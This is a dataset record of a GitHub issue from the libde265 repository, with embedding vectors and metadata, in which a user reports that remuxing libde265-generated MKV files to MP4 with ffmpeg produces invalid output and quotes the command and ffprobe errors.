-0.00033760062069632113, 0.025390055030584335, 0.004334800876677036, 0.015490067191421986, 0.022801265120506287, 0.0057038720697164536, 0.02743832767009735, 0.022360317409038544, -0.008434903807938099, 0.00876205787062645, -0.0020980576518923044, -0.0017273415578529239, 0.007339646108448505, 0.0051918039098382, -0.02328488416969776, -0.015589635819196701, 0.00848468765616417, -0.0011219275183975697, -0.0036627110093832016, 0.004861093126237392, 0.01144330482929945, -0.005774992983788252, 0.009103436954319477, 0.01999911293387413, -0.00400053383782506, -0.004861093126237392, -0.029984446242451668, 0.0014455262571573257, 0.016073256731033325, 0.005198915954679251, 0.025646088644862175, 0.0024572168476879597, 0.016514204442501068, 0.0034173449967056513, 0.005668311845511198, 0.008982531726360321, -0.0014704184141010046, 0.007986843585968018, 0.012019381858408451, -0.004896653350442648, 0.002709694905206561, 0.019174113869667053, -0.012047830037772655, 0.025532295927405357, 0.013754724524915218, 0.00421389564871788, 0.0026581324636936188, 0.00822865404188633, 0.02318531647324562, 0.00946615170687437, -0.0007818820886313915, 0.021250836551189423, -0.007567232009023428, 0.004711739718914032, -0.00903942808508873, -0.01869049482047558, 0.04913011193275452, 0.002330977702513337, 0.03240254521369934, -0.01675601303577423, -0.007008935324847698, -0.005149131640791893, -0.007652576547116041, -0.003908077254891396, 0.0219193696975708, -0.002393208211287856, -0.015874117612838745, -0.0021140598691999912, 0.018846958875656128, -0.009999556466937065, -0.012261191383004189, -0.002131839981302619, 0.004004090093076229, 0.009082101285457611, -0.013484465889632702, -0.006383073981851339, -0.00977197103202343, -0.0005854114424437284, 0.005270036403089762, -0.01675601303577423, 0.0031915369909256697, -0.011841580271720886, 0.0077236974611878395, 0.019885320216417313, -0.004925101529806852, -0.004071654286235571, 0.0207672156393528, 0.004082322586327791, 0.001124594477005303, 0.0034706853330135345, -0.00319687114097178, -0.006354625802487135, -0.005497622303664684, 0.02019825018942356, -0.0012179403565824032, 0.01950126886367798, -0.001489976653829217, -0.0009058986906893551, 0.00660710409283638, -0.0038974089547991753, 0.0019184782868251204, -0.0029603950679302216, 0.001351291430182755, -0.002796817570924759, -0.004053874406963587, 0.006578655447810888, 0.017040496692061424, 0.005810553207993507, -0.021037474274635315, 0.01490687858313322, -0.0013735166285187006, 0.019216787070035934, 0.005426501855254173, -0.03348357975482941, -0.0025621196255087852, -0.006123483646661043, 0.002571009797975421, 0.0029212788213044405, 0.010248478502035141, 0.005540295038372278, -0.02470729686319828, 0.005494066514074802, -0.005120683461427689, 0.008818954229354858, 0.01009912509471178, 0.006365293636918068, -0.016699116677045822, -0.0009090101812034845, 0.002635018201544881, 0.00463350722566247, 0.00666044419631362, -0.021080145612359047, 0.006500422954559326, 0.0053055970929563046, 0.002850158140063286, -0.008370894938707352, 0.02632884681224823, -0.0042885723523795605, 0.05180424451828003, 0.002124727936461568, -0.0030830781906843185, 0.0049393256194889545, -0.008100636303424835, -0.011678002774715424, -0.00933813489973545, 0.008548696525394917, -0.004839756991714239, 0.02531893365085125, -0.006920034531503916, -0.0075387838296592236, 0.008036628365516663, -0.021606439724564552, -0.012389209121465683, -0.00939503125846386, 0.000044644846639130265, 0.02628617361187935, 0.014878429472446442, 0.022516783326864243, -0.005956350360065699, -0.018974976614117622, 0.011564210057258606, -0.006841802038252354, 0.010248478502035141, 0.010582746006548405, -0.022417213767766953, 0.019714631140232086, 0.003644930897280574, -0.0001796906435629353, 0.009857315570116043, -0.003961417358368635, -0.0009361249394714832, -0.011436192318797112, -0.005935014225542545, 0.007094279862940311, 0.005920790135860443, -0.007055163849145174, -0.01776592619717121, -0.00617682421579957, 0.03123616799712181, 0.0043596928007900715, -0.006141263991594315, 0.007929947227239609, 0.007016047369688749, -0.001998489024117589, 0.01066097803413868, -0.0036627110093832016, 0.01827799528837204, 0.0033142201136797667, 0.02203316241502762, -0.007993956096470356, 0.0013681825948879123, 0.020368941128253937, -0.016585323959589005, 0.02739565633237362, 0.014302353374660015, 0.010298263281583786, 0.009942660108208656, 0.023099971935153008, 0.00745343929156661, 0.0039116330444812775, 0.02674134634435177, 0.020781440660357475, -0.005319821182638407, -0.012118950486183167, -0.017851270735263824, -0.04571632295846939, 0.016272393986582756, 0.018718942999839783, 0.004893097560852766, -0.0019362583989277482, -0.021023249253630638, 0.0030404056888073683, -0.0005689648096449673, 0.021336181089282036, 0.037238746881484985, 0.015874117612838745, -0.007410766556859016, 0.00898964423686266, 0.010269815102219582, 0.005508290603756905, 0.024621952325105667, 0.02051118202507496, 0.007880162447690964, -0.015347826294600964, 0.0056860921904444695, -0.009480375796556473, -0.003908077254891396, -0.006006134673953056, 0.009402143768966198, -0.002988843247294426, 0.015305153094232082, 0.014593947678804398, 0.005291373003274202, -0.016187049448490143, -0.023811178281903267, 0.005337601061910391, -0.0008921190747059882, 0.004185447469353676, 0.02688358724117279, -0.016514204442501068, 0.015077567659318447, -0.004242343828082085, -0.005465618334710598, 0.013086190447211266, -0.011023693718016148, -0.002425212413072586, -0.014778860844671726, 0.012830156832933426, -0.011080590076744556, -0.002951504895463586, -0.014593947678804398, -0.006592880003154278, 0.0055722990073263645, 0.00455883052200079, 0.008669601753354073, 0.013477354310452938, 0.01313597522675991, -0.0018633598228916526, 0.0019433704437687993, 0.013121751137077808 ]
84
null
null
null
null
null
null
null
null
null
[ "strukturag", "libde265" ]
When using FFmpeg to remux a libde265 generated mkv file to mp4 it generate an invalid output file. The simple command the I use and works for all other MKV files is the following: ffmpeg -i source.mkv -c:v copy -tag:v hvc1 output.mp4 By trying to analyze the generated file with ffprobe I see the following error: [extract_extradata @ 0x7fd9abc176c0] Invalid NAL unit 0, skipping. [hevc @ 0x7fd9ac00b000] Invalid NAL unit 0, skipping. [extract_extradata @ 0x7fd9abc176c0] No start code is found. tos-1720x720-cfg01.mp4: Invalid data found when processing input Any other files generated using other h265 library works correctly when muxed. Any hint?
FFMpeg remux issue for libde265 generated mkv files
https://api.github.com/repos/strukturag/libde265/issues/296/comments
4
2021-06-15T16:44:58
2021-06-15T17:29:14Z
https://github.com/strukturag/libde265/issues/296
921,599,425
296
false
This is a GitHub Issue repo:libde265 owner:strukturag Title : FFMpeg remux issue for libde265 generated mkv files Issue date: --- start body --- When using FFmpeg to remux a libde265 generated mkv file to mp4 it generate an invalid output file. The simple command the I use and works for all other MKV files is the following: ffmpeg -i source.mkv -c:v copy -tag:v hvc1 output.mp4 By trying to analyze the generated file with ffprobe I see the following error: [extract_extradata @ 0x7fd9abc176c0] Invalid NAL unit 0, skipping. [hevc @ 0x7fd9ac00b000] Invalid NAL unit 0, skipping. [extract_extradata @ 0x7fd9abc176c0] No start code is found. tos-1720x720-cfg01.mp4: Invalid data found when processing input Any other files generated using other h265 library works correctly when muxed. Any hint? --- end body ---
837
[ -0.035161010921001434, 0.030841156840324402, -0.014478064142167568, 0.007729924749583006, 0.019753525033593178, 0.023418856784701347, -0.022371619939804077, 0.03982122242450714, -0.03618206828832626, 0.022266896441578865, -0.0028079065959900618, -0.006807046476751566, -0.0232748631387949, 0.028825223445892334, 0.026089314371347427, 0.014176983386278152, -0.015224221162497997, 0.003743875538930297, -0.02966301329433918, -0.006892134435474873, 0.006142704747617245, -0.05136701837182045, 0.016559449955821037, 0.005039832554757595, -0.0014317705063149333, -0.0026213673409074545, -0.014962411485612392, 0.01057710312306881, -0.0017410330474376678, -0.026599843055009842, 0.02699255757033825, 0.014229345135390759, -0.01716161146759987, 0.0026786380913108587, 0.036286793649196625, 0.03979504108428955, 0.02357594296336174, 0.044193439185619354, 0.010184388607740402, 0.020250963047146797, 0.024282827973365784, -0.03811945766210556, -0.04199424013495445, 0.03275236487388611, -0.03599880263209343, 0.029244117438793182, 0.007939372211694717, 0.015093316324055195, -0.02140292525291443, -0.016297640278935432, -0.016075102612376213, 0.007160488981753588, -0.042622581124305725, -0.03534428030252457, 0.007225941400974989, -0.03670568764209747, 0.029401203617453575, 0.03770056366920471, -0.009065153077244759, 0.04971762001514435, -0.03612970560789108, -0.012776302173733711, 0.007383027113974094, 0.015996558591723442, 0.00601834524422884, 0.015263492241501808, -0.020722219720482826, 0.014216254465281963, -0.011696338653564453, 0.012049781158566475, -0.012003964744508266, -0.037386391311883926, 0.026076223701238632, 0.03542282059788704, -0.014569696970283985, -0.04078991711139679, 0.018169578164815903, 0.03335452824831009, -0.016206005588173866, 0.05733627453446388, -0.05249280110001564, -0.005121647845953703, -0.06807046383619308, 0.01831357181072235, 0.027123460546135902, -0.005167464260011911, -0.07184051722288132, -0.046340275555849075, -0.022018177434802055, -0.005282006226480007, -0.015904925763607025, 0.03544900193810463, 0.01621909625828266, 0.0009376051602885127, -0.007952462881803513, 0.01611437276005745, -0.011277442798018456, -0.00033155715209431946, -0.05186445638537407, -0.05503235012292862, -0.04390544816851616, 0.013888992369174957, 0.008724800311028957, -0.002493735169991851, 0.010472378693521023, -0.006996858399361372, 0.026102405041456223, 0.009726221673190594, 0.0019324811873957515, 0.08377902954816818, 0.011683247983455658, 0.011041814461350441, -0.0037700564134866, -0.013182107359170914, 0.008462991565465927, 0.005727082025259733, -0.005890713073313236, -0.03026517480611801, -0.01034147385507822, -0.006358697544783354, -0.002161564538255334, 0.011990874074399471, -0.023157047107815742, 0.03136477619409561, -0.007121217902749777, 0.04254404082894325, -0.008332086727023125, -0.0016903073992580175, 0.04560720920562744, -0.007134308107197285, -0.05623667314648628, -0.015237311832606792, 0.014111530967056751, 0.025264613330364227, -0.027987433597445488, 0.016035830602049828, -0.031417135149240494, 0.01207596156746149, -0.00715394364669919, 0.005072558764368296, -0.010570557788014412, -0.028406327590346336, 0.021324381232261658, 0.0021141115576028824, 0.011303624138236046, 0.007389572449028492, -0.010799640789628029, -0.000769474427215755, 0.009935669600963593, -0.0010194206843152642, -0.018470657989382744, -0.024557728320360184, 0.007422298658639193, 0.005020196549594402, 0.038381267338991165, 0.023445038124918938, 0.01741033047437668, 0.01661181077361107, -0.00007593497139168903, -0.03398286923766136, -0.006735048722475767, -0.022895239293575287, 0.017331786453723907, -0.050084151327610016, -0.009215693920850754, 0.0016935800667852163, 0.019426263868808746, 0.003668605349957943, 0.01619291678071022, 0.028432508930563927, -0.019871339201927185, 0.0056583574041724205, 0.008777162991464138, -0.014805325306952, -0.052178628742694855, -0.04346037283539772, -0.004627482499927282, 0.013110109604895115, -0.03754347935318947, -0.0011650521773844957, -0.022515615448355675, 0.029610650613904, 0.017672140151262283, 0.008338632062077522, 0.026835471391677856, -0.014451882801949978, 0.03479447960853577, -0.027856528759002686, 0.039376143366098404, -0.02459700033068657, -0.0031711673364043236, 0.06288663297891617, 0.013470097444951534, -0.0380147360265255, 0.02629876136779785, -0.021690914407372475, -0.02639039419591427, -0.036234430968761444, 0.007873919792473316, 0.013980626128613949, 0.004139862488955259, -0.005772898904979229, -0.025513332337141037, -0.03120769001543522, -0.018850281834602356, 0.009713131934404373, -0.005442364607006311, 0.053723305463790894, -0.0017181247239932418, -0.02806597575545311, -0.03906197473406792, -0.04867038130760193, 0.03427086025476456, 0.0070426748134195805, 0.02200508676469326, 0.02178254909813404, -0.04492650553584099, 0.02390320412814617, -0.019465534016489983, 0.014124620705842972, 0.011643975973129272, -0.034768298268318176, 0.004274039529263973, -0.03120769001543522, -0.037281669676303864, 0.011585068888962269, 0.0025133709423244, -0.008796798065304756, 0.001957025844603777, 0.023183228448033333, 0.03704604133963585, 0.021062571555376053, 0.00020668630895670503, 0.0005968437762930989, 0.01619291678071022, 0.02048659138381481, 0.006175430957227945, -0.014936230145394802, -0.02275124378502369, -0.01256030984222889, -0.019295359030365944, 0.04010920971632004, 0.006244156043976545, 0.013561730273067951, -0.00714739877730608, 0.04809439927339554, 0.020722219720482826, 0.01309701893478632, -0.04089463874697685, 0.009196057915687561, -0.0038027826230973005, 0.01036765519529581, 0.008260088972747326, 0.034715935587882996, -0.02432209998369217, 0.05770280957221985, 0.02082694321870804, 0.020970938727259636, -0.028458690270781517, -0.05785989388823509, 0.0019504806259647012, 0.007527022156864405, -0.019753525033593178, -0.05566069483757019, 0.00913060549646616, -0.04024011641740799, -0.002037205034866929, -0.030081909149885178, -0.011094176210463047, -0.005707446485757828, 0.003917324356734753, 0.0033266167156398296, -0.029558289796113968, 0.0002423783007543534, -0.02963683195412159, -0.01586565375328064, 0.017947038635611534, 0.008168455213308334, 0.04139207676053047, -0.006142704747617245, -0.034768298268318176, 0.037386391311883926, -0.013640273362398148, 0.043591275811195374, 0.0055372705683112144, -0.0005542997387237847, 0.012907207012176514, -0.0655570924282074, -0.038459811359643936, 0.014281706884503365, 0.015040954574942589, 0.044769421219825745, -0.033668696880340576, -0.00958222709596157, -0.024583909660577774, 0.007167034316807985, -0.015983467921614647, 0.03338070958852768, 0.05822642520070076, 0.003159713000059128, -0.014726783148944378, 0.04298911616206169, 0.031024422496557236, -0.028484871610999107, -0.05833115056157112, 0.004755114670842886, -0.017318695783615112, 0.02440064214169979, -0.022646520286798477, -0.03487302362918854, 0.05181209370493889, 0.00006729321466991678, -0.0246493611484766, 0.0224501620978117, -0.027935070917010307, 0.022541794925928116, 0.00009495706763118505, -0.016559449955821037, -0.017868496477603912, -0.017632868140935898, -0.0006410241476260126, 0.024217376485466957, -0.053278226405382156, -0.0030942608136683702, -0.0065550548024475574, -0.02966301329433918, -0.01002730242908001, 0.006669596303254366, -0.04510977119207382, 0.013823539949953556, -0.003126986790448427, -0.0034427945502102375, 0.029427384957671165, -0.002907721558585763, 0.006774320267140865, -0.00562563119456172, -0.024479186162352562, -0.03722930699586868, 0.014098440296947956, -0.012593035586178303, -0.022240715101361275, 0.025028984993696213, 0.005723809823393822, -0.008142274804413319, -0.0017672139219939709, -0.03874780237674713, -0.026586752384901047, 0.016533268615603447, 0.03756966069340706, -0.014412611722946167, 0.0007265213062055409, -0.0023039234802126884, 0.004139862488955259, 0.021416014060378075, -0.0019472079584375024, -0.019190633669495583, -0.017253244295716286, 0.010596738196909428, 0.005203463137149811, -0.0003338070819154382, -0.0015144041972234845, -0.00951677467674017, -0.005900531075894833, 0.016035830602049828, -0.01561693474650383, 0.04393162950873375, -0.03432322293519974, -0.00689867977052927, 0.01532894466072321, -0.032019298523664474, 0.02497662417590618, 0.02148146741092205, -0.035763174295425415, 0.01966189220547676, -0.04390544816851616, -0.01953098736703396, -0.006983767729252577, -0.009058607742190361, 0.007913191802799702, 0.017305606976151466, -0.04563339054584503, 0.02093166671693325, 0.039376143366098404, -0.012396678328514099, 0.005740172695368528, -0.00019431172404438257, 0.007036129478365183, 0.013221378438174725, -0.06330553442239761, -0.04152298346161842, -0.006499420385807753, 0.0060772523283958435, -0.02704491838812828, -0.037360213696956635, -0.0246493611484766, 0.07068856060504913, -0.016677264124155045, -0.03165276721119881, -0.0032235290855169296, 0.012357407249510288, 0.04126117378473282, -0.022214533761143684, 0.030474623665213585, 0.014517335221171379, -0.03479447960853577, 0.047989677637815475, -0.0011315078008919954, 0.014896959066390991, 0.01699143461883068, 0.026783108711242676, 0.0031204416882246733, 0.005056195426732302, -0.0027539085131138563, -0.04092082008719444, -0.008161909878253937, 0.029270298779010773, -0.013535549864172935, -0.0099160335958004, -0.006689231842756271, 0.004696207586675882, 0.033694878220558167, -0.008685529232025146, -0.014176983386278152, 0.0035082469694316387, 0.02242398075759411, 0.016821257770061493, -0.02417810447514057, 0.00048721107305027544, 0.03455885127186775, 0.006250701379030943, 0.023117776960134506, -0.05296405777335167, 0.045240677893161774, -0.03382578492164612, -0.0027080916333943605, -0.014530425891280174, -0.0034198863431811333, -0.030291356146335602, -0.0225810669362545, 0.005141283385455608, -0.009948760271072388, 0.02090548723936081, 0.009320417419075966, 0.023196319118142128, 0.0038387815002352, -0.013083928264677525, -0.03835508972406387, -0.04568575322628021, -0.005144556052982807, -0.03165276721119881, 0.016258368268609047, 0.06430041044950485, -0.00962804351001978, -0.021717095747590065, -0.006879043765366077, -0.0101909339427948, 0.005337640643119812, 0.020892396569252014, 0.08210345357656479, 0.002483917400240898, -0.0014996774261817336, 0.004715843126177788, -0.0023759210016578436, -0.018274301663041115, 0.008875341154634953, -0.002233562059700489, -0.04168006777763367, 0.0016322184819728136, 0.008698619902133942, -0.0033871601335704327, -0.027359090745449066, 0.0055470881052315235, -0.005910349078476429, -0.005219826474785805, 0.012481766752898693, 0.017750682309269905, -0.016153644770383835, -0.058488234877586365, 0.0036784231197088957, -0.043774545192718506, -0.007409207988530397, -0.008790252730250359, 0.022842876613140106, 0.03186221420764923, 0.0007085218676365912, -0.020368777215480804, -0.017423421144485474, -0.017593596130609512, -0.010963271372020245, 0.004100590944290161, 0.014805325306952, 0.00033442070707678795, -0.00941859558224678, -0.023013053461909294, -0.008973519317805767, -0.00294044753536582, -0.005282006226480007, -0.013313012197613716, 0.026612933725118637, 0.002423373982310295, 0.0014636785490438342, 0.00566817494109273, 0.008901522494852543, -0.013849721290171146, 0.0059136212803423405, -0.014412611722946167, 0.0024282829836010933, 0.06409095972776413, -0.015564572997391224, -0.01334573794156313, -0.0024740996304899454, 0.011277442798018456, -0.013404645025730133, -0.02814451791346073, 0.0028259060345590115, -0.03327598422765732, -0.0012157777091488242, 0.023785389959812164, 0.03780528903007507, 0.011107266880571842, -0.023157047107815742, -0.00742884399369359, 0.012612671591341496, 0.01676889695227146, -0.003133532125502825, -0.01165052130818367, -0.012645397335290909, 0.0006438876735046506, -0.02280360460281372, -0.005576541647315025, -0.021272020414471626, -0.02652129903435707, 0.012769756838679314, 0.038931068032979965, 0.00046880258014425635, 0.0045816656202077866, -0.015067134983837605, -0.017397239804267883, -0.004905655048787594, -0.029898641631007195, -0.010472378693521023, 0.03508247062563896, -0.03665332496166229, 0.004008957650512457, -0.04034483805298805, -0.0050169238820672035, -0.007631746120750904, 0.0035180647391825914, -0.011054905131459236, -0.02073531039059162, 0.02440064214169979, 0.0027948161587119102, 0.015813292935490608, 0.03023899346590042, -0.008980064652860165, 0.021298199892044067, 0.009398960508406162, 0.03296181187033653, 0.01686052978038788, -0.011670157313346863, -0.003989321645349264, 0.016546359285712242, 0.00924187432974577, -0.007546658162027597, -0.01100254338234663, 0.023287951946258545, 0.00930732674896717, -0.011827242560684681, -0.025487152859568596, 0.009457867592573166, -0.004944926593452692, 0.00901933666318655, 0.021612372249364853, 0.013849721290171146, -0.007893555797636509, 0.0035933349281549454, 0.013666454702615738, -0.001444042893126607, -0.0018768466543406248, -0.012704304419457912, 0.04563339054584503, -0.0038813254795968533, -0.02404719963669777, 0.0039467778988182545, 0.02005460485816002, -0.005105284508317709, -0.003914051689207554, 0.012789392843842506, -0.04199424013495445, 0.00006933860277058557, -0.02118038572371006, 0.023667575791478157, -0.024439914152026176, 0.008829524740576744, 0.0369151346385479, -0.01741033047437668, -0.0008672438561916351, 0.011297078803181648, 0.030396079644560814, -0.004084227606654167, -0.05196918174624443, 0.025238433852791786, -0.008894977159798145, 0.003861689707264304, -0.010177843272686005, -0.006463421508669853, -0.023837752640247345, -0.03487302362918854, -0.022738153114914894, 0.036758050322532654, 0.012593035586178303, 0.009837491437792778, 0.059587836265563965, 0.011009088717401028, -0.003236619522795081, -0.0032873451709747314, 0.019570257514715195, 0.030893517658114433, -0.004994015675038099, -0.003218620317056775, -0.002176291309297085, -0.02908703312277794, 0.03934996575117111, 0.0016592175234109163, -0.0011249625822529197, 0.022541794925928116, -0.0015029499772936106, -0.000798518885858357, -0.008240452967584133, -0.008790252730250359, -0.01930844783782959, 0.034218497574329376, -0.022594157606363297, -0.04762314260005951, -0.018405206501483917, 0.0017541234847158194, 0.05073867738246918, -0.038983430713415146, 0.03023899346590042, 0.014530425891280174, 0.019766615703701973, 0.005943074822425842, -0.01875864900648594, 0.019845157861709595, -0.029008489102125168, -0.006047798786312342, 0.0008705165237188339, -0.012049781158566475, 0.0016559449722990394, 0.003144986229017377, -0.027830347418785095, -0.03322362154722214, -0.00228265137411654, 0.0045293038710951805, 0.011729064397513866, -0.035318098962306976, 0.03424467891454697, 0.04298911616206169, -0.00224828883074224, -0.020944757387042046, -0.019727343693375587, 0.008175000548362732, 0.02652129903435707, -0.02484571933746338, 0.01741033047437668, 0.01036765519529581, -0.002639366779476404, 0.01100254338234663, 0.011081085540354252, -0.010675281286239624, 0.03555372729897499, -0.02297378145158291, 0.031076785176992416, 0.0033069809433072805, -0.004758387338370085, -0.008541533723473549, 0.0019144817488268018, 0.03023899346590042, 0.03725548833608627, 0.011022178456187248, 0.03063170798122883, -0.0017819406930357218, -0.01616673544049263, 0.01047892402857542, -0.02707109972834587, 0.011048359796404839, 0.02564423717558384, -0.025316976010799408, 0.00015616526070516557, -0.026914013549685478, 0.02572278119623661, 0.02704491838812828, -0.018693195655941963, 0.05189063772559166, -0.013103564269840717, -0.022764334455132484, 0.015420578420162201, 0.006126341875642538, 0.011846878565847874, -0.032150205224752426, 0.010694917291402817, 0.005864532198756933, -0.010570557788014412, -0.013051202520728111, -0.03343306854367256, 0.007376481778919697, 0.003671877784654498, -0.007036129478365183, -0.009464412927627563, 0.006859408225864172, 0.019976062700152397, 0.01991061121225357, -0.01007966510951519, 0.011886149644851685, -0.019976062700152397, 0.008973519317805767, -0.02440064214169979, -0.007265212945640087, -0.05566069483757019, -0.0037635110784322023, 0.00047371152322739363, -0.02269888110458851, -0.027280546724796295, 0.010217114351689816, 0.00576962623745203, -0.0036031529307365417, 0.011159628629684448, 0.016546359285712242, 0.006159068085253239, 0.0100534837692976, -0.029558289796113968, -0.02748999558389187, -0.005655084736645222, 0.018117215484380722, -0.026115495711565018, 0.019347719848155975, -0.009785128757357597, -0.009012791328132153, 0.013862811960279942, 0.017933949828147888, -0.016258368268609047, -0.002302287146449089, -0.008515353314578533, -0.03345924988389015, 0.002158291870728135, -0.039428506046533585, -0.0014718601014465094, 0.011434528976678848, -0.02426973730325699, 0.009909488260746002, 0.027228185907006264, 0.032097842544317245, 0.005403093062341213, -0.03353779390454292, -0.012259228155016899, 0.00913060549646616, 0.018051763996481895, 0.003190802875906229, 0.03563226759433746, -0.00002152769229724072, 0.0007314301910810173, -0.018051763996481895, -0.008548079058527946, 0.013110109604895115, 0.018876463174819946, 0.0013695907546207309, 0.023890115320682526, 0.006227792706340551, 0.018130306154489517, -0.01636309176683426, -0.004175860900431871, 0.011938512325286865, -0.025840595364570618, -0.010420016944408417, 0.03220256417989731, -0.018156487494707108, -0.03322362154722214, 0.0059136212803423405, 0.02195272408425808, -0.0006328425952233374, -0.06545236706733704, -0.009451322257518768, -0.029767736792564392, 0.012939933687448502, -0.0007171125034801662, 0.004725661128759384, 0.021769458428025246, 0.015682388097047806, 0.006990313064306974, 0.004175860900431871, -0.003005899954587221, -0.007311029359698296, 0.020656768232584, -0.039899762719869614, -0.00594962015748024, -0.027935070917010307, 0.025683509185910225, -0.0038256908301264048, -0.022921418771147728, -0.01988442987203598, -0.021442195400595665, 0.020093876868486404, 0.0019504806259647012, -0.02390320412814617, -0.041313536465168, -0.010930545628070831, 0.01861465349793434, 0.020015334710478783, -0.027699442580342293, 0.0355275459587574, -0.026102405041456223, -0.0016207642620429397, 0.021612372249364853, 0.010668735951185226, 0.019321538507938385, -0.0058481693267822266, 0.023641396313905716, -0.01167670264840126, -0.023405766114592552, 0.036234430968761444, -0.021690914407372475, 0.028170699253678322, -0.00527546089142561, -0.017305606976151466, -0.0036162433680146933, -0.03712458163499832, -0.0026966375298798084, 0.014595878310501575, 0.00020034560293424875, 0.017305606976151466, -0.0051281931810081005, 0.01055092178285122, -0.0040416838601231575, -0.0150802256539464, -0.02310468629002571, 0.018143396824598312, -0.0019242996349930763, -0.012265773490071297, -0.04110408574342728, 0.02063058689236641, -0.035867899656295776, 0.01532894466072321, -0.014687511138617992, -0.029977185651659966, -0.00320552964694798, -0.017423421144485474, -0.007887010462582111, -0.01149998139590025, 0.0009384233271703124, -0.008894977159798145, 0.007441934198141098, 0.0385645367205143, 0.02349740080535412, -0.0024021018762141466, 0.010878183878958225, 0.0027048191986978054, -0.0028520869091153145, -0.005079103633761406, 0.028877584263682365, -0.018575381487607956, 0.01828739233314991, 0.009300781413912773, -0.01768523082137108, -0.01754123531281948, 0.007716834079474211, -0.019570257514715195, 0.0001023715958581306, -0.0060510714538395405, -0.020120058208703995, 0.006126341875642538, -0.023157047107815742, -0.010557467117905617, 0.014726783148944378, 0.001597037771716714, -0.027332909405231476, -0.012769756838679314, -0.03487302362918854, -0.0011249625822529197, 0.01009275484830141, 0.011323260143399239, 0.011310169473290443, 0.012108688242733479, -0.03123386949300766, 0.026036951690912247, 0.039978306740522385, -0.0036293338052928448, 0.0011175991967320442, -0.028275422751903534, -0.036286793649196625, 0.009313872084021568, 0.013378463685512543, 0.0014227709034457803, -0.023733029142022133, -0.006515783257782459, 0.014373339712619781, 0.023117776960134506, -0.002729363739490509, -0.04398399218916893, 0.0059823463670909405, -0.00863316748291254, -0.00138922652695328, 0.0018719377694651484, 0.00983094610273838, 0.010197479277849197, -0.02806597575545311, -0.015708567574620247, 0.012056326493620872, 0.017947038635611534, -0.013744997791945934, 0.02756853774189949, 0.017672140151262283, -0.015813292935490608, -0.01016475260257721, -0.016507087275385857, -0.03081497550010681, 0.00028103610384278, -0.013339192606508732, -0.004169316031038761, 0.028353966772556305, 0.03741257265210152, -0.037360213696956635, 0.006348879542201757, 0.021821819245815277, 0.023759210482239723, 0.000034746004530461505, -0.03874780237674713, -0.021848000586032867, 0.004584938287734985, -0.007945917546749115, 0.01348318811506033, 0.005396547727286816, -0.00944477692246437, 0.02112802490592003, -0.022371619939804077, -0.03081497550010681, 0.013784268870949745, -0.018156487494707108, 0.010524740442633629, 0.015931107103824615, -0.03534428030252457, 0.03319744020700455, 0.03348543122410774, -0.020015334710478783, -0.027123460546135902, -0.015551482327282429, 0.016454724594950676, -0.0007457479368895292, -0.0032006208784878254, -0.023746119812130928, -0.02360212430357933, -0.002429919084534049, -0.02911321260035038, -0.005776171572506428, -0.020525863394141197, -0.013902083039283752, 0.006195066496729851, -0.025578785687685013, 0.011630886234343052, -0.0060248905792832375, 0.015525301918387413, 0.016350001096725464, 0.0054521821439266205, -0.014137711375951767, -0.011571979150176048, 0.0006447058403864503, -0.0034329767804592848, -0.032124023884534836, 0.025604967027902603, -0.03408759459853172, -0.015538392588496208, -0.004342764616012573, -0.013195197097957134, 0.01147380005568266, 0.023261772468686104, -0.015983467921614647, 0.02337958663702011, 0.016480905935168266, -0.009438231587409973, -0.0038485992699861526, -0.024518456310033798, -0.01741033047437668, -0.033040355890989304, 0.030029546469449997, -0.029767736792564392, 0.019439352676272392, 0.005396547727286816, -0.016428545117378235, 0.0013442280469462276, -0.019190633669495583, 0.00668595964089036, 0.006774320267140865, 0.012854845263063908, 0.030893517658114433, -0.026455847546458244, 0.052178628742694855, 0.004064592067152262, 0.014347159303724766, -0.0028520869091153145, 0.013731907121837139, -0.018667016178369522, -0.03880016505718231, 0.00903242640197277, 0.004735478665679693, 0.0020093878265470266, 0.01696525327861309, 0.03704604133963585, 0.015381306409835815, 0.01963571086525917, -0.009163331240415573, 0.021311290562152863, -0.013744997791945934, -0.014347159303724766, 0.01404607854783535, -0.0327785462141037, -0.015289673581719398, 0.011041814461350441, 0.021075662225484848, 0.002048659138381481, 0.01460896898061037, 0.015852563083171844, 0.023641396313905716, -0.028851404786109924, -0.009012791328132153, -0.024282827973365784, 0.002510098274797201, 0.02707109972834587, -0.02646893821656704, -0.0027260910719633102, 0.02167782373726368, 0.019845157861709595, -0.016677264124155045, -0.002858632244169712, 0.013051202520728111, 0.02495044283568859, 0.0009441504371352494, -0.010609828867018223, 0.02170400507748127, -0.028327785432338715, -0.00641105929389596, -0.01140180230140686, 0.028275422751903534, -0.009065153077244759, -0.035867899656295776, -0.02467554248869419, 0.008718255907297134, 0.017423421144485474, 0.01848374865949154, 0.005160919390618801, 0.011506526730954647, -0.016624901443719864, -0.007265212945640087, 0.01140180230140686, 0.06676141917705536, -0.005628903862088919, 0.009438231587409973, 0.01338500902056694, -0.01235086191445589, 0.013941354118287563, 0.014923140406608582, -0.005246007349342108, -0.011467254720628262, -0.0349777452647686, -0.0012026872718706727, -0.012095597572624683, -0.03594643995165825, -0.029977185651659966, -0.011041814461350441, 0.022135991603136063, 0.0002278560568811372, 0.02487190067768097, 0.008888431824743748, -0.0009736039792187512, -0.02090548723936081, -0.005213281139731407, 0.028327785432338715, -0.02098402939736843, 0.009608407504856586, 0.00020208419300615788, -0.012593035586178303, -0.011467254720628262, 0.00011750745761673898, -0.005210008472204208, 0.01072764303535223, 0.01055092178285122, -0.047911133617162704, 0.0059823463670909405, -0.013823539949953556, -0.01614055410027504, 0.005088921636343002, 0.005291823763400316, -0.009261510334908962, -0.010518196038901806, -0.0018113943515345454, -0.03377342224121094, -0.003842053934931755, 0.020028425380587578, 0.02085312455892563, 0.03798855468630791, 0.014373339712619781, 0.0032169839832931757, 0.008436810225248337, -0.00163712736684829, -0.018928825855255127, -0.020224781706929207, 0.01746269129216671, -0.0012673215242102742, 0.0034166136756539345, 0.011912330985069275, -0.012658488005399704, -0.0009294236078858376, 0.005484908353537321, 0.009137150831520557, -0.011624340899288654, -0.0011969602201133966, -0.0023415584582835436, 0.0060936156660318375, 0.003475520759820938, 0.0006733412155881524, 0.023458128795027733, 0.026063133031129837, -0.014032987877726555, 0.014347159303724766, -0.030448442324995995, -0.019740434363484383, 0.0013270467752590775, 0.0017672139219939709, 0.0003417840925976634, -0.008031005971133709, -0.01724015362560749, -0.020617496222257614, 0.009189512580633163, 0.020565133541822433, 0.008188091218471527, 0.04144443944096565, -0.015878744423389435, -0.0034722480922937393, -0.015433668158948421, 0.004028593190014362, -0.030448442324995995, 0.03246437385678291, -0.0037111493293195963, -0.03487302362918854, -0.03434940427541733, 0.031129145994782448, 